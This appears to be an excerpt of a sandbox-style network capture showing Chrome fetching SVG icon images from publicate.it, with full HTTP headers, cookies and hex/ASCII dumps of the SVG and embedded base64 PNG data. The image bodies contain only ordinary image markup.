                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _ga=GA1.2.1381680606.1725034579; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698
                                                                                                                                                                                                        2024-08-30 16:16:22 UTC757INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:22 GMT
                                                                                                                                                                                                        Content-Type: image/svg+xml
                                                                                                                                                                                                        Content-Length: 110652
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:04 GMT
                                                                                                                                                                                                        etag: "1b03c-620aa1d13b3bf"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j7XVclHwEUXhYKZkImDp49RPAZTvbBdMqL%2Ba3GkckPxHf0yMNASsmi55urHRf%2FU8sDtdKhmtXu6Yk%2BoFZx97VZxDl%2BThdM0nZAiIbMLO1Qk7S2iuntnN2jDW%2BgO2pg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615ba1db043ca-EWR
                                                                                                                                                                                                        2024-08-30 16:16:22 UTC612INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 31 33 36 70 78 22 20 68 65 69 67 68 74 3d 22 31 33 36 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 33 36 20 31 33 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 37 2e 39 34 32 33 30 37 36 39 2c 30 20 4c 31 31 30
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="UTF-8"?><svg width="136px" height="136px" viewBox="0 0 136 136" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <title>4</title> <defs> <path d="M7.94230769,0 L110
                                                                                                                                                                                                        2024-08-30 16:16:22 UTC1369INData Raw: 6c 74 65 72 2d 32 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 65 4d 6f 72 70 68 6f 6c 6f 67 79 20 72 61 64 69 75 73 3d 22 30 2e 35 22 20 6f 70 65 72 61 74 6f 72 3d 22 64 69 6c 61 74 65 22 20 69 6e 3d 22 53 6f 75 72 63 65 41 6c 70 68 61 22 20 72 65 73 75 6c 74 3d 22 73 68 61 64 6f 77 53 70 72 65 61 64 4f 75 74 65 72 31 22 3e 3c 2f 66 65 4d 6f 72 70 68 6f 6c 6f 67 79 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 65 4f 66 66 73 65 74 20 64 78 3d 22 30 22 20 64 79 3d 22 34 22 20 69 6e 3d 22 73 68 61 64 6f 77 53 70 72 65 61 64 4f 75 74 65 72 31 22 20 72 65 73 75 6c 74 3d 22 73 68 61 64 6f 77 4f 66 66 73 65 74 4f 75 74 65 72 31 22 3e 3c 2f 66 65 4f 66 66 73 65 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 65 47 61 75 73 73 69 61 6e 42 6c 75 72 20
                                                                                                                                                                                                        Data Ascii: lter-2"> <feMorphology radius="0.5" operator="dilate" in="SourceAlpha" result="shadowSpreadOuter1"></feMorphology> <feOffset dx="0" dy="4" in="shadowSpreadOuter1" result="shadowOffsetOuter1"></feOffset> <feGaussianBlur
                                                                                                                                                                                                        2024-08-30 16:16:22 UTC1369INData Raw: 34 32 33 30 37 37 22 20 78 6c 69 6e 6b 3a 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 53 77 41 41 41 45 73 43 41 59 41 41 41 42 35 66 59 35 31 41 41 41 41 41 58 4e 53 52 30 49 41 72 73 34 63 36 51 41 41 41 45 52 6c 57 45 6c 6d 54 55 30 41 4b 67 41 41 41 41 67 41 41 59 64 70 41 41 51 41 41 41 41 42 41 41 41 41 47 67 41 41 41 41 41 41 41 36 41 42 41 41 4d 41 41 41 41 42 41 41 45 41 41 4b 41 43 41 41 51 41 41 41 41 42 41 41 41 42 4c 4b 41 44 41 41 51 41 41 41 41 42 41 41 41 42 4c 41 41 41 41 41 44 59 59 49 4c 6e 41 41 42 41 41 45 6c 45 51 56 52 34 41 65 79 39 7a 2b 2b 75 62 58 66 57 64 65 2f 39 50 76 30 5a 61 71 30 74 62 61 45 56 32 6d 4a 56 55
                                                                                                                                                                                                        Data Ascii: 423077" xlink:href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAASwAAAEsCAYAAAB5fY51AAAAAXNSR0IArs4c6QAAAERlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAA6ABAAMAAAABAAEAAKACAAQAAAABAAABLKADAAQAAAABAAABLAAAAADYYILnAABAAElEQVR4Aey9z++ubXfWde/9Pv0Zaq0tbaEV2mJVU
                                                                                                                                                                                                        2024-08-30 16:16:22 UTC1369INData Raw: 65 4d 5a 76 4f 47 57 46 64 33 67 70 36 69 32 4e 47 51 76 4d 76 52 34 36 32 6f 55 53 39 52 49 7a 6b 4d 36 6d 59 5a 38 56 32 76 73 75 59 50 54 78 77 34 61 57 67 72 42 74 6f 70 56 6e 59 48 54 4d 6a 79 37 4d 69 49 79 78 6e 6c 4b 33 69 71 79 71 2b 34 44 36 6b 64 6d 62 48 7a 6e 57 53 45 44 31 76 46 46 31 6e 72 30 4f 68 5a 41 64 65 4e 70 48 4d 77 74 69 73 37 34 44 45 48 72 4e 7a 42 57 30 7a 47 62 58 79 56 63 2b 47 70 77 5a 6e 76 30 5a 55 65 6e 32 32 54 77 31 45 4e 39 35 4b 35 6f 43 64 72 45 51 79 76 79 36 70 56 51 36 6d 38 47 4a 79 71 52 50 6c 32 68 71 72 41 47 4f 6a 75 52 35 65 51 30 54 75 54 35 6a 41 54 58 48 65 51 4f 67 33 54 31 39 53 4e 76 4a 35 4a 54 65 4c 73 52 55 35 38 41 78 74 6f 64 66 2b 69 2f 4c 67 76 53 62 58 76 46 5a 47 4a 43 72 78 42 50 32 4d 31 36
                                                                                                                                                                                                        Data Ascii: eMZvOGWFd3gp6i2NGQvMvR462oUS9RIzkM6mYZ8V2vsuYPTxw4aWgrBtopVnYHTMjy7MiIyxnlK3iqyq+4D6kdmbHznWSED1vFF1nr0OhZAdeNpHMwtis74DEHrNzBW0zGbXyVc+GpwZnv0ZUen22Tw1EN95K5oCdrEQyvy6pVQ6m8GJyqRPl2hqrAGOjuR5eQ0TuT5jATXHeQOg3T19SNvJ5JTeLsRU58Axtodf+i/LgvSbXvFZGJCrxBP2M16
                                                                                                                                                                                                        2024-08-30 16:16:22 UTC1369INData Raw: 79 71 48 38 54 66 47 6b 30 63 47 52 4a 54 68 77 2b 62 62 6c 73 57 63 77 50 38 56 30 72 62 42 54 30 65 45 30 31 44 59 35 6e 48 69 75 47 56 56 50 33 5a 68 32 71 57 4e 4e 32 75 7a 52 41 49 42 76 2b 63 45 6c 65 7a 7a 59 49 4e 76 4f 2b 73 53 75 66 75 75 41 42 6f 6d 50 47 7a 31 6c 34 56 38 71 5a 59 46 61 4f 58 6f 6f 7a 48 4b 44 4d 62 4b 64 31 66 6d 54 45 49 6f 42 70 73 64 48 48 6d 57 33 6b 65 74 4a 58 67 50 47 74 32 59 46 35 77 72 37 71 45 4b 70 69 59 53 47 33 2b 4f 44 4b 41 2f 6a 76 42 67 5a 6f 57 50 55 4d 48 65 2b 52 6d 76 4b 6d 42 4d 41 49 6a 76 33 6a 49 4d 52 70 57 75 39 6a 74 6a 58 45 46 79 6e 4a 66 50 57 33 4f 4d 41 77 53 58 44 6e 74 4e 54 76 45 42 35 79 41 34 65 46 4e 5a 57 78 73 34 2b 45 75 38 6d 6b 6d 4e 78 70 65 39 5a 6c 49 6c 4f 56 6e 4f 69 56 2f 31
                                                                                                                                                                                                        Data Ascii: yqH8TfGk0cGRJThw+bblsWcwP8V0rbBT0eE01DY5nHiuGVVP3Zh2qWNN2uzRAIBv+cElezzYINvO+sSufuuABomPGz1l4V8qZYFaOXoozHKDMbKd1fmTEIoBpsdHHmW3ketJXgPGt2YF5wr7qEKpiYSG3+ODKA/jvBgZoWPUMHe+RmvKmBMAIjv3jIMRpWu9jtjXEFynJfPW3OMAwSXDntNTvEB5yA4eFNZWxs4+Eu8mkmNxpe9ZlIlOVnOiV/1
                                                                                                                                                                                                        2024-08-30 16:16:22 UTC1369INData Raw: 4a 57 6d 5a 49 57 57 36 54 7a 47 4b 74 57 68 4d 53 43 6a 50 30 78 78 6a 66 46 66 5a 54 53 70 71 30 73 4b 59 5a 6f 6c 71 36 52 64 38 6b 6d 57 31 57 69 2b 63 32 73 46 63 71 65 48 57 44 30 62 77 74 71 38 62 46 37 73 45 2f 4b 61 65 62 31 37 78 55 2b 4d 77 64 45 35 70 5a 79 42 5a 68 36 77 76 56 79 5a 4a 36 70 70 48 6c 6e 6e 71 48 55 51 4c 4d 4d 72 32 74 5a 31 5a 63 55 6b 30 4e 42 6b 32 49 72 32 68 62 31 30 31 78 6e 42 4f 79 32 43 7a 68 56 2f 76 50 6f 6b 31 5a 38 38 4f 36 33 57 77 2b 4e 72 5a 67 70 7a 2f 6a 36 42 42 54 49 69 61 6c 47 66 48 72 7a 33 71 76 71 43 57 64 66 78 78 4d 5a 37 31 63 47 61 43 69 42 50 33 6f 75 51 63 45 59 47 48 79 58 73 2f 63 6d 61 7a 49 6c 4e 58 72 78 70 4d 4f 71 56 2b 36 6f 73 38 50 64 32 39 58 6c 64 6e 6b 39 6b 36 79 77 79 36 6c 62 73
                                                                                                                                                                                                        Data Ascii: JWmZIWW6TzGKtWhMSCjP0xxjfFfZTSpq0sKYZolq6Rd8kmW1Wi+c2sFcqeHWD0bwtq8bF7sE/Kaeb17xU+MwdE5pZyBZh6wvVyZJ6ppHlnnqHUQLMMr2tZ1ZcUk0NBk2Ir2hb101xnBOy2CzhV/vPok1Z88O63Ww+NrZgpz/j6BBTIialGfHrz3qvqCWdfxxMZ71cGaCiBP3ouQcEYGHyXs/cmazIlNXrxpMOqV+6os8Pd29Xldnk9k6ywy6lbs
                                                                                                                                                                                                        2024-08-30 16:16:22 UTC1369INData Raw: 64 31 65 58 51 31 6b 75 62 56 37 46 78 4a 4b 67 37 79 71 4a 51 6f 73 66 61 76 49 53 34 2f 65 71 77 61 42 54 4f 72 33 6c 71 76 2b 47 44 7a 43 72 37 56 44 46 55 6b 6e 6a 41 36 74 4c 6f 67 63 48 6c 63 31 2f 70 7a 76 64 6e 44 33 2b 67 69 79 4f 33 44 59 38 52 52 6b 46 70 59 61 4b 65 74 37 53 37 58 49 4c 49 48 38 39 6a 64 75 63 42 35 37 74 46 4a 74 64 73 65 74 56 48 57 6c 37 6f 46 47 6a 56 51 59 38 32 6f 63 78 44 44 32 59 48 52 54 49 55 37 6f 32 47 73 31 58 57 39 6a 47 6d 4a 49 57 69 2b 45 58 38 39 30 2b 51 4e 4b 56 6c 54 52 30 34 79 4b 6e 71 33 2f 70 54 6b 79 52 47 70 31 55 39 75 4f 38 4e 4a 48 79 69 32 4d 79 64 2f 49 6c 4f 6e 4b 7a 52 7a 2b 48 68 39 64 78 31 47 44 7a 61 6d 58 44 4a 7a 70 6a 50 62 7a 53 45 7a 6f 4f 47 6c 46 71 48 31 44 41 6b 2b 4f 47 50 31 50
                                                                                                                                                                                                        Data Ascii: d1eXQ1kubV7FxJKg7yqJQosfavIS4/eqwaBTOr3lqv+GDzCr7VDFUknjA6tLogcHlc1/pzvdnD3+giyO3DY8RRkFpYaKet7S7XILIH89jducB57tFJtdsetVHWl7oFGjVQY82ocxDD2YHRTIU7o2Gs1XW9jGmJIWi+EX890+QNKVlTR04yKnq3/pTkyRGp1U9uO8NJHyi2Myd/IlOnKzRz+Hh9dx1GDzamXDJzpjPbzSEzoOGlFqH1DAk+OGP1P
                                                                                                                                                                                                        2024-08-30 16:16:22 UTC1369INData Raw: 59 63 6f 79 56 55 57 61 45 66 63 49 39 4f 4c 62 41 49 4f 4e 4a 33 79 71 59 53 6d 66 2f 76 6c 36 72 4b 45 75 4c 4d 67 68 72 73 6d 70 54 2b 56 51 43 72 76 4f 61 30 67 6c 52 64 53 78 59 4c 4f 66 71 48 53 7a 48 7a 75 31 78 4f 4e 41 44 4d 44 34 36 6e 55 44 63 71 63 70 65 61 57 67 52 52 33 6c 47 4b 48 53 74 4c 58 4a 69 4a 76 59 4d 6b 34 47 65 65 6e 4c 56 55 4a 65 35 4d 57 74 6b 53 43 4f 66 30 52 31 75 4d 6b 78 6e 6a 5a 2b 4b 37 47 4d 32 30 31 4b 72 47 4e 6f 54 31 77 39 69 6b 4a 6e 50 5a 71 49 66 50 32 6a 47 74 50 4b 33 7a 6b 36 55 4b 44 68 58 78 71 69 62 31 6e 4c 5a 38 53 63 38 53 48 6e 67 4b 58 50 79 48 4c 77 6a 65 38 65 54 79 35 43 78 6c 4c 76 34 35 79 45 72 77 49 36 44 69 43 33 30 71 69 4a 35 33 48 50 50 65 67 72 6d 68 48 58 4b 75 67 32 73 68 6a 4d 36 74 64
                                                                                                                                                                                                        Data Ascii: YcoyVUWaEfcI9OLbAIONJ3yqYSmf/vl6rKEuLMghrsmpT+VQCrvOa0glRdSxYLOfqHSzHzu1xONADMD46nUDcqcpeaWgRR3lGKHStLXJiJvYMk4GeenLVUJe5MWtkSCOf0R1uMkxnjZ+K7GM201KrGNoT1w9ikJnPZqIfP2jGtPK3zk6UKDhXxqib1nLZ8Sc8SHngKXPyHLwje8eTy5CxlLv45yErwI6DiC30qiJ53HPPegrmhHXKug2shjM6td
                                                                                                                                                                                                        2024-08-30 16:16:22 UTC1369INData Raw: 75 4a 43 44 4e 33 38 49 2b 62 35 64 2f 45 59 79 76 34 77 38 31 32 47 30 7a 54 70 72 72 52 50 4a 41 66 43 63 37 46 30 61 47 71 59 53 4e 43 69 50 6a 34 31 66 57 76 6f 45 35 79 6c 41 70 59 48 4d 41 79 67 2b 6c 55 6e 77 4f 44 44 63 72 4f 39 41 77 73 37 72 30 70 30 35 6b 62 43 65 75 58 6a 49 4b 79 52 7a 7a 71 59 33 78 5a 70 45 72 65 56 72 42 31 4e 59 72 78 57 78 4f 7a 35 49 65 71 76 55 74 66 37 6f 41 62 4b 44 47 6f 4e 34 31 65 7a 33 6e 42 77 2f 79 46 37 4c 59 53 58 69 53 6b 67 57 64 73 36 77 74 72 63 49 2b 45 65 54 30 56 6a 52 69 39 71 35 58 78 4e 6f 31 57 4e 65 42 6d 59 4e 74 34 49 79 78 6a 2b 5a 66 44 64 41 44 7a 35 39 56 6c 50 33 79 55 57 66 69 4f 63 31 4f 67 47 45 76 53 4d 2b 4c 66 35 50 4b 49 4c 72 68 42 7a 53 66 47 57 6e 54 59 6d 68 54 56 31 69 65 72 71
                                                                                                                                                                                                        Data Ascii: uJCDN38I+b5d/EYyv4w812G0zTprrRPJAfCc7F0aGqYSNCiPj41fWvoE5ylApYHMAyg+lUnwODDcrO9Aws7r0p05kbCeuXjIKyRzzqY3xZpEreVrB1NYrxWxOz5IeqvUtf7oAbKDGoN41ez3nBw/yF7LYSXiSkgWds6wtrcI+EeT0VjRi9q5XxNo1WNeBmYNt4Iyxj+ZfDdADz59VlP3yUWfiOc1OgGEvSM+Lf5PKILrhBzSfGWnTYmhTV1ierq
                                                                                                                                                                                                        2024-08-30 16:16:22 UTC1369INData Raw: 6f 42 67 7a 6f 4e 72 45 63 53 70 79 37 33 31 33 46 71 6c 4b 36 4e 69 5a 37 67 71 4e 42 6e 6e 4a 61 44 6b 64 32 58 5a 77 4c 4c 32 6f 52 6a 74 79 49 56 55 4c 73 72 5a 75 4d 54 52 69 45 35 38 39 4d 49 2f 37 59 38 52 73 2b 37 55 6b 4e 5a 4a 54 70 62 34 36 5a 50 5a 65 33 62 34 63 59 4f 6f 58 4d 76 63 35 44 55 4f 6f 72 46 5a 6e 6e 49 37 6b 75 76 31 48 49 46 32 6e 64 55 66 4c 4c 4b 66 73 42 66 4b 36 6a 79 6f 77 76 65 72 56 2b 75 73 54 58 4b 4c 6f 45 76 4b 73 6f 65 45 70 56 4e 64 37 6a 2f 58 45 6c 37 50 5a 65 69 61 43 7a 6d 48 73 59 4a 6e 61 4d 51 78 31 77 6f 63 52 58 49 32 6a 43 35 7a 47 49 35 39 78 50 78 71 73 4b 78 55 61 58 52 30 73 6d 49 6e 78 78 47 7a 41 71 7a 36 31 78 72 65 64 54 6c 45 2b 51 72 78 7a 63 4f 50 6f 77 4b 56 6b 71 42 38 54 77 42 30 47 53 79 4f
                                                                                                                                                                                                        Data Ascii: oBgzoNrEcSpy7313FqlK6NiZ7gqNBnnJaDkd2XZwLL2oRjtyIVULsrZuMTRiE589MI/7Y8Rs+7UkNZJTpb46ZPZe3b4cYOoXMvc5DUOorFZnnI7kuv1HIF2ndUfLLKfsBfK6jyowverV+usTXKLoEvKsoeEpVNd7j/XEl7PZeiaCzmHsYJnaMQx1wocRXI2jC5zGI59xPxqsKxUaXR0smInxxGzAqz61xredTlE+QrxzcOPowKVkqB8TwB0GSyO


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        75192.168.2.549848104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:22 UTC923OUTGET /images/macOS_client.svg HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicate
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _ga=GA1.2.1381680606.1725034579; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698
                                                                                                                                                                                                        2024-08-30 16:16:22 UTC753INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:22 GMT
                                                                                                                                                                                                        Content-Type: image/svg+xml
                                                                                                                                                                                                        Content-Length: 609249
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:05 GMT
                                                                                                                                                                                                        etag: "94be1-620aa1d1dc5e9"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Uu3yJdgv99CjE6ZB5SeNsjn579qsJybkE8sw18%2FFVwMrOx4ONEPoAzzPwrDinkQGE%2FFqVzsFIZxrRXEfBOoF2qLjB4CrM8bou6vZKAiVUag2bLTTXOFGxa57C%2FjRSw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615be38831998-EWR
                                                                                                                                                                                                        2024-08-30 16:16:22 UTC616INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 31 33 36 70 78 22 20 68 65 69 67 68 74 3d 22 31 33 36 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 33 36 20 31 33 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 31 30 2e 30 37 33 31 37 30 37 2c 30 20 4c 31 30 37
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="UTF-8"?><svg width="136px" height="136px" viewBox="0 0 136 136" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <title>5</title> <defs> <path d="M10.0731707,0 L107
                                                                                                                                                                                                        2024-08-30 16:16:22 UTC1369INData Raw: 2d 32 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 65 4d 6f 72 70 68 6f 6c 6f 67 79 20 72 61 64 69 75 73 3d 22 30 2e 35 22 20 6f 70 65 72 61 74 6f 72 3d 22 64 69 6c 61 74 65 22 20 69 6e 3d 22 53 6f 75 72 63 65 41 6c 70 68 61 22 20 72 65 73 75 6c 74 3d 22 73 68 61 64 6f 77 53 70 72 65 61 64 4f 75 74 65 72 31 22 3e 3c 2f 66 65 4d 6f 72 70 68 6f 6c 6f 67 79 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 65 4f 66 66 73 65 74 20 64 78 3d 22 30 22 20 64 79 3d 22 34 22 20 69 6e 3d 22 73 68 61 64 6f 77 53 70 72 65 61 64 4f 75 74 65 72 31 22 20 72 65 73 75 6c 74 3d 22 73 68 61 64 6f 77 4f 66 66 73 65 74 4f 75 74 65 72 31 22 3e 3c 2f 66 65 4f 66 66 73 65 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 65 47 61 75 73 73 69 61 6e 42 6c 75 72 20 73 74 64 44
                                                                                                                                                                                                        Data Ascii: -2"> <feMorphology radius="0.5" operator="dilate" in="SourceAlpha" result="shadowSpreadOuter1"></feMorphology> <feOffset dx="0" dy="4" in="shadowSpreadOuter1" result="shadowOffsetOuter1"></feOffset> <feGaussianBlur stdD
                                                                                                                                                                                                        2024-08-30 16:16:22 UTC1369INData Raw: 20 78 6c 69 6e 6b 3a 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 6f 41 41 41 41 4b 41 43 41 59 41 41 41 41 4d 7a 63 6b 6a 41 41 41 41 41 58 4e 53 52 30 49 41 72 73 34 63 36 51 41 41 41 45 52 6c 57 45 6c 6d 54 55 30 41 4b 67 41 41 41 41 67 41 41 59 64 70 41 41 51 41 41 41 41 42 41 41 41 41 47 67 41 41 41 41 41 41 41 36 41 42 41 41 4d 41 41 41 41 42 41 41 45 41 41 4b 41 43 41 41 51 41 41 41 41 42 41 41 41 43 67 4b 41 44 41 41 51 41 41 41 41 42 41 41 41 43 67 41 41 41 41 41 41 41 6b 73 37 2f 41 41 42 41 41 45 6c 45 51 56 52 34 41 65 78 39 43 59 41 64 52 62 58 32 7a 5a 32 62 6d 35 6c 68 4d 70 6b 6b 6b 34 55 77 68 44 45 45 43 46 73 49 49 62 4a 45
                                                                                                                                                                                                        Data Ascii: xlink:href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAoAAAAKACAYAAAAMzckjAAAAAXNSR0IArs4c6QAAAERlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAA6ABAAMAAAABAAEAAKACAAQAAAABAAACgKADAAQAAAABAAACgAAAAAAAks7/AABAAElEQVR4Aex9CYAdRbX2zZ2bm5lhMpkkk4UwhDEECFsIIbJE
                                                                                                                                                                                                        2024-08-30 16:16:22 UTC1369INData Raw: 46 52 4d 65 4b 4c 58 2f 7a 69 49 59 41 5a 2b 4d 55 32 53 61 5a 79 4e 6d 58 4b 6c 68 32 61 39 73 6b 44 62 39 49 44 71 55 4f 39 53 63 65 6c 5a 73 6b 44 79 51 50 4a 41 38 6b 44 2f 7a 59 50 6c 4c 74 32 45 65 74 72 79 78 6f 73 2f 69 7a 65 55 7a 6e 57 4b 31 6f 79 51 74 37 52 32 70 72 76 5a 4b 43 48 6a 51 2f 61 36 32 46 37 35 67 45 62 4e 43 6a 58 30 4e 42 77 7a 48 6e 6e 6e 56 63 50 6d 44 4e 2f 61 67 38 79 42 48 73 78 4a 70 78 59 53 73 6b 44 61 2b 32 42 31 4a 48 57 32 6f 56 4a 51 50 4a 41 38 6b 44 79 51 50 4c 41 57 2b 53 42 62 45 42 45 74 54 45 6d 57 72 64 6a 71 2f 66 59 59 34 2f 61 71 36 2b 2b 65 76 78 46 46 31 31 55 47 2f 46 6d 72 33 31 71 31 39 74 68 5a 4e 76 45 76 48 48 37 50 4e 49 49 50 4f 39 58 74 4e 6b 2f 48 77 67 71 49 49 77 62 44 61 32 70 32 66 76 34 34
                                                                                                                                                                                                        Data Ascii: FRMeKLX/ziIYAZ+MU2SaZyNmXKlh2a9skDb9IDqUO9ScelZskDyQPJA8kD/zYPlLt2Eetryxos/izeUznWK1oyQt7R2prvZKCHjQ/a62F75gEbNCjX0NBwzHnnnVcPmDN/ag8yBHsxJpxYSskDa+2B1JHW2oVJQPJA8kDyQPLAW+SBbEBEtTEmWrdjq/fYY4/aq6++evxFF11UG/Fmr31q19thZNvEvHH7PNIIPO9XtNk/HwgqIIwbDa2p2fv44
                                                                                                                                                                                                        2024-08-30 16:16:22 UTC1369INData Raw: 79 77 6f 67 52 49 79 70 2f 2f 38 41 44 73 79 5a 73 75 65 57 5a 59 47 65 64 70 54 6a 49 49 30 41 62 68 51 56 37 49 2f 74 38 38 49 67 33 79 62 53 2b 75 48 54 70 30 76 75 66 65 75 71 70 33 7a 37 30 30 45 4e 50 72 6c 69 78 59 75 57 71 56 61 74 61 38 45 57 52 74 70 45 6a 52 78 61 2b 2f 76 57 76 4c 38 52 78 63 39 46 49 4f 62 75 46 6d 51 31 70 6c 7a 78 51 7a 67 4f 68 6b 35 61 72 54 46 6a 79 51 50 4a 41 38 6b 44 79 77 49 44 31 67 41 49 64 4f 55 44 6c 50 4a 35 7a 47 7a 46 6a 78 6f 79 4a 32 30 32 61 74 4f 66 67 49 55 50 47 46 44 43 37 68 6d 66 73 47 76 48 73 32 37 51 4b 76 41 49 46 41 55 37 54 4b 79 2b 2f 2f 46 45 30 2f 44 34 32 42 53 4e 71 72 7a 4c 6c 45 6f 76 4c 78 4a 6a 45 36 30 72 64 39 36 79 33 37 64 42 44 44 36 30 5a 6a 4e 75 37 4e 70 76 42 49 43 38 37 2b 2b
